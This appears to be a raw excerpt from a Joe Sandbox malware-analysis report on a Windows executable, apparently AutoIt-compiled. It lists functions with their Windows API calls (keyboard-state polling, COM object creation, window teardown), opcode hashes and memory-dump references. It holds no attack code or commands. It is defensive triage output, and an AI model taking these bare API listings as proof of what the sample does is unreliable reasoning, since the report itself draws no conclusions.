                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                • API String ID: 3375834691-2160076837
                                                                                                                                                                                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                                                                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                                                                • API String ID: 2907320926-3566645568
                                                                                                                                                                                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                                                                                Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                                                                                                • DeleteObject.GDI32(00430000), ref: 00470A04
                                                                                                                                                                                                                • DestroyIcon.USER32(0043003D), ref: 00470A1C
                                                                                                                                                                                                                • DeleteObject.GDI32(2D4F75A0), ref: 00470A34
                                                                                                                                                                                                                • DestroyWindow.USER32(006F0074), ref: 00470A4C
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                                                                                                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1237572874-0
                                                                                                                                                                                                                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                                                                                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                                                                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                                                                                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                                                                                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3413494760-0
                                                                                                                                                                                                                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                                                                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                • API String ID: 2634073740-771828931
                                                                                                                                                                                                                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                                                                                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                                                                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                • API String ID: 2294789929-1287834457
                                                                                                                                                                                                                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                                                                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                • API String ID: 2483343779-2107944366
                                                                                                                                                                                                                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                                                                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                • String ID: -----$SysListView32
                                                                                                                                                                                                                • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                                                                                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                                                                                • GetParent.USER32 ref: 00469C98
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                                                                                • GetParent.USER32 ref: 00469CBC
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                • API String ID: 2360848162-1403004172
                                                                                                                                                                                                                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                                                                                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
